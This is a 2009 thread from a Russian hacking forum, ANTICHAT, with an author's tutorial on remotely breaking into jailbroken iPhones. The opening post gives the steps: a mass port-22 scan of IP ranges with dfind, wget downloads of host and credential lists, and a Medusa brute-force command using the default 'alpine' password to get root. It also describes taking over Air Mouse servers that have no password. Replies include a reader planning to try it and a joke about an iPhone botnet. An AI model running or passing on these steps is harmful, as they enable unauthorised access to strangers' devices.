HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу Удаленный взлом Iphone!
   
 
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Удаленный взлом Iphone!
  #1  
Старый 10.12.2009, 16:34
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию Удаленный взлом Iphone!
Предыстория

Недавно в IT-новостях появилась информация о уязвимости в Iphone/Ipod Touch,что при установлении из Cydia приложения OpenSSH есть уязвимость.Уязвимость в том,что стоит стандартный пароль alpine.
В статье я покажу как взломать Iphone через SSH,и как можно использовать root на Iphone.


Инструменты для взлома

1)Любой сканер портов,я предпочитаю dfind.(Скачать

2)Windows-Дедик с мощным каналом

3)Хостинг с SSH(для брута через SSH)


Взламываем

Первый шаг
Ставим на Windows-дедик dfind,для удобвства создаем bat'ник со следующим содержанием:
Код:
dfind.exe -p 22 73.43.54.12 73.255.255.255
Запускаем сканер,ждем когда же будут результаты:


В dfind сохраняет результаты в txt-файле dfind.txt
Ждать надо примерно часа два-три,чтобы побольше набралось IP-адресов с открытым 22 портом.
Лучше всего сканить Ip-адреса USA,т.к. компания Apple,американская фирма.


Второй шаг
Качаем SSH-клиент,например Putty( http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html )
Заходим на свой SSH-акк,и ставим брутфорс Medusa.
Настройка Medusa

Закачиваем на сервак три файла на сервак:
hosts.txt,login.txt,password.txt

В hosts.txt добавляем айпи насканеные нами в виде:
Код:
87.123.51.79
27.123.52.113
27.123.52.140
27.123.52.184
27.123.54.33
27.123.58.139
27.123.61.139
27.123.62.62
87.123.62.155
в login.txt добавляем лишь два логина:
Код:
root
mobile
В password.txt только пароль alpine
Закачиваем на сервак:

Код:
wget http://site.com/hosts.txt
Код:
wget http://site.com/password.txt
Код:
wget http://site.com/login.txt
Дальше выполняем следующую команду:
Код:
medusa -T 3 -H hosts.txt -U login.txt -P password.txt -O good.txt -M ssh


Ждемс результата брута!
Смотрем good.txt

Через несколько минут у меня уже был 1 сбрученный ssh-акк к Iphone.
Подконнектился через putty и вот я удаленно подсоединился к Iphone:
Код:
login as: root
root@*******'s password:
iPhone-blackas:~ root#
Защита от SSH
Через программу BossPrefs,вырубаешь SSH




А так если вам не нужен OpenSSH,то вообще не закачивается его!

Authorization bypas в Air Mouse

Authorization bypass
Уязвимость подобия той,когда нашли в jailbreak'нутом Iphone/Ipod Touch в службе SSH!

После установки сервера на Windows 7,я запустил Air Mouse.exe и я увидел следующее:



Порт по дефолту:51010
Пароль по дефолту не стоит!
Так мы сможем получить доступ к чужой мышке,надо иметь Iphone/Ipod Touch,сканер портов на порт 51010
Сканим и подключаемся,и будет иметь доступ к чужой мышке.
Вот такая уязвимость,получили доступ к чужой мrol21ышке!

(С)Xcontrol212
Последний раз редактировалось Xcontrol212; 10.12.2009 в 17:02..
 

  #2  
Старый 10.12.2009, 16:54
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542

Репутация: 94
Отправить сообщение для <Cyber-punk> с помощью ICQ
По умолчанию
в хакере давно типа токого было
 

  #3  
Старый 10.12.2009, 17:03
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию
Цитата:
Сообщение от <Cyber-punk>  
в хакере давно типа токого было
Хм,не видал!
 

  #4  
Старый 10.12.2009, 18:18
PhoeniX174
Новичок
Регистрация: 16.10.2009
Сообщений: 16
Провел на форуме:
233853

Репутация: 1
По умолчанию
видел в хакере подобную статью, если не ошибаюсь то называется "Конь в яблоках"
 

  #5  
Старый 10.12.2009, 18:34
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию
Угу,нашел
ТУт я процесс описал более подробно= )
http://www.xakep.ru/post/48932/default.asp
 

  #6  
Старый 12.12.2009, 11:15
GRobbeRZ
Познающий
Регистрация: 14.08.2009
Сообщений: 87
Провел на форуме:
2105830

Репутация: 52
Отправить сообщение для GRobbeRZ с помощью ICQ Отправить сообщение для GRobbeRZ с помощью AIM
По умолчанию
Спасибо познавательно! Попробуем
 

  #7  
Старый 12.12.2009, 22:48
ZaraZ
Участник форума
Регистрация: 27.08.2007
Сообщений: 155
Провел на форуме:
268091

Репутация: 36
По умолчанию
Ботнет из айфонов это что-то новое)
 

  #8  
Старый 12.12.2009, 22:55
Xtrem
Постоянный
Регистрация: 28.07.2007
Сообщений: 339
Провел на форуме:
3835305

Репутация: 318
Отправить сообщение для Xtrem с помощью ICQ
По умолчанию
Цитата:
Сообщение от Xcontrol212  
Предыстория
что при установлении из Cydia приложения OpenSSH есть уязвимость.Уязвимость в том,что стоит стандартный пароль
мда... сидия устанавливается только на взломанный айфон.. тоесть вы собственноручно его взламываете
с тем же успехом можете у себя на компе установить себе коня или сборку хз какую виндовса хп, в который какойнить вася вшил свои дыры чтобы потом из вас сделать ботнет.
а че вы хотите после взлома ифона чтоб он еще и норм робил??
бред
в нор бла бла бла лень писать
 

  #9  
Старый 12.12.2009, 23:03
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
Thumbs down
Цитата:
Сообщение от Xtrem  
мда... сидия устанавливается только на взломанный айфон.. тоесть вы собственноручно его взламываете
с тем же успехом можете у себя на компе установить себе коня или сборку хз какую виндовса хп, в который какойнить вася вшил свои дыры чтобы потом из вас сделать ботнет.
а че вы хотите после взлома ифона чтоб он еще и норм робил??
бред
в нор бла бла бла лень писать
А ломают прошивку,чтобы не платить деньги за каждую игру и программу,надо было знать...
После jailbreak телефон айфон/айпод нормально робит


человек это вы бред несете,google.ru почитал бы: OpenSSH система предпосылки которая позволяет вам подключить к вашему iPhone над wifi и перенести архивы от вашего компьютера к вашему iPhone

Вообще то в Cydia загружается все с открытым исходным кодом,что там можно посмотреть исходный код
Мда,что сказать,Ты даже не юзал айфон/айпод тач и говоришь такие вещи,иди лучше погугли информации,прежде чем писать бред....
Последний раз редактировалось Xcontrol212; 12.12.2009 в 23:05..
 

  #10  
Старый 13.12.2009, 00:00
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию
Мне кажется или только ленивый не писал про взлом iPhone через дефолтные 2 акка? Хорошо, что статья наглядная, но очень, очень изъезжено.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
 
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Prizrak- 17 лет. Смешно. baltika Болталка 35 23.08.2009 16:21
Взлом iPhone через SMS five5feer Болталка 9 31.07.2009 02:33
Mozilla поддержала взлом iPhone Phm.phx Мировые новости. Обсуждения. 17 05.03.2009 01:15
Подборка уязвимостей phpBB -=ka$at1k=- Уязвимости CMS / форумов 3 02.07.2006 15:26



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ